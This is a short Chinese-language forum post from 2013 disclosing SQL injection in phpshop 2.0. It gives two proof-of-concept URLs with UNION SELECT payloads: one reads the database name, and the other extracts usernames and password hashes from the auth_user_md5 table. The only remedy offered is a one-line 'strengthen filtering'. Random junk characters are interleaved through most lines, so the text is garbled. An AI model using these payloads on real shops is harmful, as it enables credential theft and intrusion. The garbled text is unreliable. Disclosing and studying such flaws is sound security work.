标题 : phpshop 2.0 SQL Injection Vulnerability
2 Z0 Z" l* x5 U4 \3 D, I$ u5 Y" B1 m7 a/ b9 {9 ^. o8 l4 J! X
作者 : By onestree
4 ]; Z( I& r+ e/ W* h8 K: c& |下载地址 : http://code.google.com/p/phpshop/downloads/list
2 J" L# w6 D# d, p. j. B测试地址: windows 7 / ubuntu# T3 M5 W0 i2 y1 A0 G+ y; }3 m) X, y
5 a' \1 h: {7 `$ P
/ G% Z) Z3 q8 X- aSQLi p0c:
- |7 W) z2 `$ J. d
$ T# h. n: a+ I, ]1 R4 R==================9 X, f( F" M' k' e" w- ~5 s/ o1 I
7 x/ V* n! Q# `* w
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
; W! d' P$ J" Sunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
) u# K. d; F! A2 W1 ]' _
) g6 e) A) k, `# }5 F6 B' F9 Qhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
/ y: c# G) T+ V N7 j) q' G! x+ p: B8 I' |7 Q; E0 F
修复:
' U }' P2 g; E: c3 U加强过滤0 M5 J) O) a! @1 H% g4 s( }
- b2 n: J4 P1 q# e' Y9 ^9 M# @1 _, X8 \
|
发表于 2013-1-18 18:24:10
收藏
支持
反对